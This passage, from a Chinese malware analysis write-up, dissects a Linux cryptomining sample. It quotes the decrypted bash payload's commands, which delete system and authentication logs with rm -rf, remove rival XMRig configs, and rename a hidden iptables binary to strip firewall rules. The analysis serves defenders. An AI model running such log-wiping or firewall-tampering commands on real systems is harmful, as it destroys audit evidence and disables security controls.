currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Perl/Node/Ruby 执行包装 (v63=2,3,4)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_405084</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4214916</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">PHP/Lua 执行包装 (v63=5,7)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_405122</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4215074</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Rscript 执行包装 (v63=6)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_46CBE0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4639728</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">核心进程执行</span></font><font face="宋体"><span leaf="">— PATH 查找解释器 → </span></font></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">execve</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">文件执行之后从自身解密出需要执行的bash代码，在bash代码中包含了如下几个核心的恶意逻辑：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong><span leaf="" style="font-style: normal;text-align: justify;font-size: 15px;letter-spacing: 1px;word-break: break-all;font-weight: bold;color: rgb(13, 74, 182);box-sizing: border-box;">反取</span></strong><strong><span leaf="" style="font-style: normal;text-align: justify;font-size: 15px;letter-spacing: 1px;word-break: break-all;font-weight: bold;color: rgb(13, 74, 182);box-sizing: border-box;">证</span></strong></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /var/www/html/config.json          </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 删除 Web 服务器配置</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /root/.xmrig.json                  </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 删除 XMRig 矿工配置</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /root/.config/xmrig.json           </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 删除 XMRig 备用配置</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /var/log/messages*                 </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># ★ 摧毁系统日志</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /var/log/secure*                   </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># ★ 摧毁安全审计日志</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /var/log/auth.log*                 </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># ★ 摧毁认证日志</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /var/log/syslog*                   </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># ★ 摧毁 syslog</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">摧毁系统审计日志, 使入侵检测和安全分析失效。删除别的挖矿程序配置。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong><span leaf="" style="font-style: normal;text-align: justify;font-size: 15px;letter-spacing: 1px;word-break: break-all;font-weight: bold;color: rgb(13, 74, 182);box-sizing: border-box;">系统调优 + 防火墙规避</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">提高系统资源上限 (为挖矿优化)</span></span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">echo</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;fs.file-max = 2097152&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> &gt; /etc/sysctl.conf   </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 写入内核参数</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">sysctl </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-p</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 立即生效</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">ulimit </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-SHn</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(17,102,68);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">1024000</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 提高进程文件句柄上限</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">隐藏 iptables 二进制</span></span></p><p data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mv</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /usr/sbin/tokens /usr/sbin/iptables     </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># &#34;恢复&#34; iptables (tokens → iptables)</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mv</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /sbin/tokens /sbin/</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">iptables </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:1.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 同上</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">脚本假设系统管理员已将 iptables 重命名为 tokens 以阻止恶意软件使用。脚本将其&#34;恢复正常&#34;, 然后操纵防火墙规则, 最后再隐藏:</span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mv</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /usr/sbin/iptables /usr/sbin/tokens     </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 再次隐藏 iptables</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mv</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /sbin/iptables /sbin/tokens</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">移除已知矿池 C2 的防火墙封锁,脚本搜索并删除针对以下 IP 段的 INPUT DROP 规则:</span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">IP段</span></span></b></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">提供商</span></font></span></b></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">138.68.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p 